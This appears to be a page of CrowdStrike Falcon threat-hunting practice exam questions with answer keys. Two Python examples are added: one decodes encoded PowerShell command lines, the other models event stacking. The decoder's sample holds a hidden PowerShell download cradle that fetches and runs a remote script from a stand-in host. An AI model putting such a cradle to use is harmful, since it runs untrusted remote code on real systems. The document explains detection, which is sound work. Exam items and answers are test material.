Refer to Exhibit. Falcon detected the above file attempting to execute. At initial glance, what indicators can we use to provide an initial analysis of the file?
A. VirusTotal, Hybrid Analysis, and Google pivot indicator lights enabled
B. File name, path, Local and Global prevalence within the environment
C. File...
Which SPL (Splunk) field name can be used to automatically convert Unix times (Epoch) to UTC readable time within the Falcon Event Search?
A. utc_time
B. conv_time
C. _time
D. time
Answer: C
Explanation: _time is the SPL (Splunk) field name that can be used to automatically convert Unix times...
To find events that are outliers inside a network, ___________ is the best hunting method to use.
A. time-based
B. machine learning
C. searching
D. stacking
Answer: D
Explanation: Stacking (Frequency Analysis) is the best hunting method to use to find events that are outliers inside a network. Stacking involves grouping events...
What Search page would help a threat hunter differentiate testing, DevOps, or general user activity from adversary behavior?
A. Hash Search
B. IP Search
C. Domain Search
D. User Search
Answer: D
Explanation: User Search is a search page that allows a threat hunter to search for user activity across...
The Falcon Detections page will attempt to decode Encoded PowerShell Command line parameters when which PowerShell Command line parameter is present?
A. -Command
B. -Hidden
C. -e
D. -nop
Answer: C
Explanation: The Falcon Detections page will attempt to decode Encoded PowerShell Command line parameters when the -e parameter (the abbreviated form of -EncodedCommand, which carries the script as a Base64-encoded UTF-16LE string) is...
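As an added example (not code from the page, from CrowdStrike, or from the Falcon console), the following Python shows what such decoding involves: locate the switch that selects EncodedCommand (powershell.exe accepts any unambiguous prefix of the parameter name, so -e, -ec, -enc and -EncodedCommand all work), Base64-decode the next token, and interpret the bytes as UTF-16LE. The sample command line, the script inside it and the example.invalid URL are constructed for this example.

```python
import base64
import binascii
from typing import Optional


def find_encoded_payload(cmdline: str) -> Optional[str]:
    """Return the token that follows an -EncodedCommand style switch, or None.

    powershell.exe resolves any unambiguous prefix of a parameter name, so -e, -ec,
    -enc and -EncodedCommand all select EncodedCommand. Only '-' switches are handled;
    the payload itself never contains whitespace, so a plain split is enough.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):          # the switch needs a following token
        if not tok.startswith("-"):
            continue
        name = tok[1:].lower()
        if name and "encodedcommand".startswith(name):
            return tokens[i + 1].strip("'\"")
    return None


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode the script passed via -e/-enc/-EncodedCommand; None if absent or malformed."""
    payload = find_encoded_payload(cmdline)
    if payload is None:
        return None
    try:
        raw = base64.b64decode(payload, validate=True)   # reject non-Base64 tokens
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:                                    # UTF-16LE needs an even byte count
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


# Constructed sample for this example: an encoded download cradle as Falcon would
# show it in the command line of a powershell.exe process (hostname/URL are made up).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLE_PAYLOAD = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -e {SAMPLE_PAYLOAD}"

if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
```

A command line that uses -Command or -File carries its script in clear text, so nothing is decoded for it; that is why the presence of the -e style switch is the trigger.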
SPL (Splunk) eval statements can be used to convert Unix times (Epoch) into UTC readable time. Which eval function is correct?
A. now
B. typeof
C. strftime
D. relative_time
Answer: C
Explanation: The strftime eval function is used to convert Unix times (Epoch) into UTC readable time. It takes...
Which structured analytic technique contrasts different hypotheses to determine which is the best leading (prioritized) hypothesis?
A. Model hunting framework
B. Competitive analysis
C. Analysis of competing hypotheses
D. Key assumptions check
Answer: C
Explanation: Analysis of competing hypotheses is a structured analytic technique that contrasts different hypotheses to determine...
The help desk is reporting an increase in calls related to user accounts being locked out over the last few days. You suspect that this could be an attack by an adversary against your organization. Select the best hunting hypothesis from the following:
A. A zero-day vulnerability is being exploited...
Which field should you reference in order to find the system time of a *FileWritten event?
A. ContextTimeStamp_decimal
B. FileTimeStamp_decimal
C. ProcessStartTime_decimal
D. timestamp
Answer: A
Explanation: ContextTimeStamp_decimal is the field that shows the system time of the event that triggered the sensor to send data to the cloud. In...
When exporting the results of the following event search, what data is saved in the exported file (assuming Verbose Mode)?
event_simpleName=*Written | stats count by ComputerName
A. The text of the query
B. The results of the Statistics tab
C. No data. Results can only be exported when the "table"...
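As an added example (not code from the page or from CrowdStrike), the following Python models what the stacking, strftime, ContextTimeStamp_decimal and `*Written | stats count by ComputerName` questions above describe, over a handful of constructed Falcon-style events: it applies the wildcard filter, counts per ComputerName the way the Statistics tab would show it, pulls out the rare tail that stacking is meant to surface, and renders ContextTimeStamp_decimal as readable UTC with strftime. Hostnames, paths and timestamps are made up for the example.

```python
import fnmatch
import time
from collections import Counter
from typing import Dict, Iterable, List, Tuple

# Constructed sample events (Falcon-like field names; hosts, paths and times are made up).
# The ProcessRollup2 row is there only to show the *Written filter excluding it.
SAMPLE_EVENTS: List[Dict] = [
    {"event_simpleName": "PeFileWritten", "ComputerName": "WS-0142",
     "ContextTimeStamp_decimal": 1700000000.0, "TargetFileName": "C:\\Users\\a\\Downloads\\setup.exe"},
    {"event_simpleName": "ScriptFileWritten", "ComputerName": "WS-0142",
     "ContextTimeStamp_decimal": 1700000060.5, "TargetFileName": "C:\\Users\\a\\AppData\\Local\\Temp\\x.ps1"},
    {"event_simpleName": "PeFileWritten", "ComputerName": "WS-0142",
     "ContextTimeStamp_decimal": 1700000125.0, "TargetFileName": "C:\\Users\\a\\Downloads\\tool.exe"},
    {"event_simpleName": "PeFileWritten", "ComputerName": "WS-0217",
     "ContextTimeStamp_decimal": 1700000300.0, "TargetFileName": "C:\\Program Files\\Vendor\\app.exe"},
    {"event_simpleName": "ScriptFileWritten", "ComputerName": "WS-0217",
     "ContextTimeStamp_decimal": 1700000400.0, "TargetFileName": "C:\\Temp\\login.vbs"},
    {"event_simpleName": "DmpFileWritten", "ComputerName": "SRV-BUILD01",
     "ContextTimeStamp_decimal": 1700003600.0, "TargetFileName": "C:\\Windows\\Temp\\lsass.dmp"},
    {"event_simpleName": "ProcessRollup2", "ComputerName": "WS-0999",
     "ContextTimeStamp_decimal": 1700000010.0, "ProcessStartTime_decimal": 1700000009.8},
]


def epoch_to_utc(epoch: float, fmt: str = "%Y-%m-%d %H:%M:%S") -> str:
    """Python's strftime over gmtime: the same job SPL's strftime(<epoch>, fmt) does, in UTC."""
    return time.strftime(fmt, time.gmtime(epoch))


def stack(events: Iterable[Dict], where: str, by: str) -> Counter:
    """Model of `event_simpleName=<where> | stats count by <by>`: glob-filter, then count."""
    return Counter(e[by] for e in events
                   if fnmatch.fnmatchcase(e.get("event_simpleName", ""), where) and by in e)


def stats_rows(counts: Counter) -> List[Tuple[str, int]]:
    """The Statistics-tab view of a stack: one row per value, most frequent first."""
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def rare_tail(counts: Counter, max_count: int = 1) -> List[str]:
    """Frequency analysis: values seen at or below max_count are the outliers to examine."""
    return sorted(v for v, n in counts.items() if n <= max_count)


def first_seen_utc(events: Iterable[Dict], where: str = "*Written") -> Dict[str, str]:
    """Earliest matching event per host, timed by ContextTimeStamp_decimal (the sensor's
    system time for the event, which is the field to use for *FileWritten) and shown in UTC."""
    first: Dict[str, float] = {}
    for e in events:
        if not fnmatch.fnmatchcase(e.get("event_simpleName", ""), where):
            continue
        host, ts = e["ComputerName"], float(e["ContextTimeStamp_decimal"])
        if host not in first or ts < first[host]:
            first[host] = ts
    return {h: epoch_to_utc(ts) for h, ts in first.items()}


if __name__ == "__main__":
    counts = stack(SAMPLE_EVENTS, "*Written", "ComputerName")
    for host, n in stats_rows(counts):          # what the Statistics tab would list
        print(f"{host:<12} {n}")
    print("rare tail:", rare_tail(counts))
    print("first seen (UTC):", first_seen_utc(SAMPLE_EVENTS))
```

The rare tail here is the single host that wrote a .dmp file; in a real environment the threshold is set against the fleet size, and the stacked field is whatever axis the hypothesis calls for (parent process, file path, user), not only ComputerName.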